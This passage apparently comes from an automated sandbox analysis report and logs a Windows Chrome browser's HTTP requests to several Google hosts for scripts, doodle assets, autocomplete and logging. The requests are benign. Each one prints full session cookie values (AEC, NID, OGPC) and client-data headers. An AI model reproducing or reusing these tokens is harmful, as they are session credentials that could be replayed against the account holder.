;tosKvd:ZCqP3;trZL0b:qY8PFe;uuQkY:u2V3ud;vGrMZ:lPJJ0c;vfVwPd:lcrkwe;w3bZCb:ZPGaIb;w4rSdf:XKiZ9;w9w86d:dt4g2b;wQlYve:aLUfP;wR5FRb:O1Gjze,TtcOte;wV5Pjc:L8KGxe;whEZac:F4AmNb;xBbsrc:NEW1Qc;ysNiMc:CpIBjd;yxTchf:KUM7Z;z97YGf:oug9te;zOsCQe:Ko78Df;zaIgPb:Qtpxbd/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: empty
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /widget/callout?prid=19037050&pgid=19037049&puid=9ceb59a7585b55bd&eom=1&cce=1&dc=1&origin=https%3A%2F%2Fwww.google.com&cn=callout&pid=1&spid=538&hl=en HTTP/1.1Host: ogs.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/messages.en.nocache.json HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /logos/doodles/2024/popcorn/rc4/popcorn.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ogs.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/ck=xjs.hd.3K9kqFG9IbE.L.B1.O/am=JCkAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAABAAACAAAAAAAAEAUoDsJAABGAQAbABAAAAAAAAIAgAEAAYIAACIBAAABAnABABAIAIACABEJAICgCcCjTIBACBAmgAAKIAQoQAIEiiAUIgAAAAMAAIQAMMAwAEEFAKMAAQAAAAAAECACACCAYwABAgD0EAgAA4E0AQAQAnoAAgAAAEAAQAEggAANgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/ujg=1/rs=ACT90oFp4gBNGXk7N4F5TdcKKkHmQCd2hQ/m=sb_wiz,aa,abd,syu0,sytz,sytu,syfw,syty,sytk,sy10v,sy103,sytp,sy102,syup,sytv,sytx,sytt,syue,syti,syuf,syug,syu7,syub,sytq,syu5,syu8,syu9,syu2,syu3,sytl,sytm,syrv,syrk,syri,syrh,syto,sy101,syuo,syun,syum,async,sywj,ifl,pHXghd,sf,sys2,sys5,sy48m,sonic,TxCJfd,sy48q,qzxzOb,IsdWVc,sy48s,sy1fe,sy1bs,sy1bo,syrg,syre,syrf,syrd,syrc,sy47c,sy47f,sy2c0,sy17n,sy14e,sy14f,syrq,syr8,syfa,sybu,sybx,sybs,sybw,sybv,syco,spch,sysv,sysu,rtH1bd,sy1cx,sy18q,sy17f,syg8,sy1cw,sy14k,sy1cv,sy17g,syga,sy1cy,SMquOb,sy8f,sygh,syge,sygf,sygi,sygd,sygq,sygo,sygm,sygc,sycl,sycg,sycj,syaj,syab,syb5,syai,syah,syag,sya4,syb0,syap,sy9r,sy9q,sych,sybz,syc0,syc6,syan,syb8,syc5,syby,sybr,sybq,syae,syal,syc1,sybm,sybj,sybi,sybk,syad,syb6,sybd,sybb,sybf,sybc,sybe,sya8,syb3,sycq,syd5,sycr,syd6,sya6,syb2,sya9,syb4,sya5,syb1,syao,syaa,sycp,syce,syca,sycb,sy9u,sy9y,sy9v,sy9z,sy9w,sy9o,sy9l,sy9n,sya3,syc2,syg2,sygb,syg7,syg5,sy7y,sy7v,sy7x,syg4,syg9,syg3,syg1,syfy,syfx,sy81,uxMpU,syft,syd0,sycy,sycs,syd7,sycu,syct,sybg,sycw,sycn,sy8x,sy8w,sy8v,Mlhmy,QGR0gd,aurFic,sy96,fKUV3e,OTA3Ae,sy8g,OmgaI,EEDORb,PoEs9b,Pjplud,sy8r,sy8k,A1yn5d,YIZmRd,uY49fb,sy7s,sy7q,sy7r,sy7p,sy7o,byfTOb,lsjVmc,LEikZe,kWgXee,Ug7Xab,U0aPgd,ovKuLd,sgY6Zb,qafBPd,ebZ3mb,dowIGb,sy1d2,sy1cz,syzi,syt6,d5EhJe,sy1di,fCxEDd,sywo,sy1dh,sy1dg,sy1df,sy1db,sy1d6,sy1d8,sy1d7,sy1da,sy1am,sy1af,sy17w,sywn,syz4,syz3,T1HOxc,sy1d9,sy1d5,zx30Y,sy1dj,sy1dd,sy192,Wo3n8,syv0,loL8vb,syv4,syv3,syv2,ms4mZb,syq8,B2qlPe,syw2,NzU6V,sy117,sywi,zGLm3b,syxw,syxx,syxo,DhPYme,MpJwZc,UUJqVe,sy7l,sOXFj,sy7k,s39S4,oGtAuc,NTMZac,nAFL3,sy8d,sy8c,q0xTif,y05UD,sy14x,sy1ce,sy1c8,syz2,sy1c0,sy16f,syz1,syz0,syyz,syz5,sy1c7,sy167,sy1bw,sy16c,sy1c6,sy14s,sy1c1,sy1bx,sy16d,sy16e,sy1c9,sy14h,sy1c5,sy1c4,sy1c2,syno,sy1c3,sy1cb,sy1bq,sy1by,sy1bp,sy1bv,sy1br,sy17a,sy1bz,sy1bl,sy16h,sy16i,syz7,syz8,epYOx?xjs=s3 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCN
Source: global traffic HTTP traffic detected: GET /xjs/_/js/md=2/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/messages.en.nocache.json HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic HTTP traffic detected: GET /complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=64P1ZseiHfKwi-gPg-6IsAw.1727366125395&dpr=1&nolsbt=1 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic HTTP traffic detected: GET /client_204?atyp=i&biw=1280&bih=907&ei=64P1ZseiHfKwi-gPg-6IsAw&opi=89978449 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic HTTP traffic detected: GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic HTTP traffic detected: GET /logos/2024/popcorn/rc4/preload-sprite.png HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO; OGPC=19037049-1:
Source: global traffic HTTP traffic detected: GET /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; 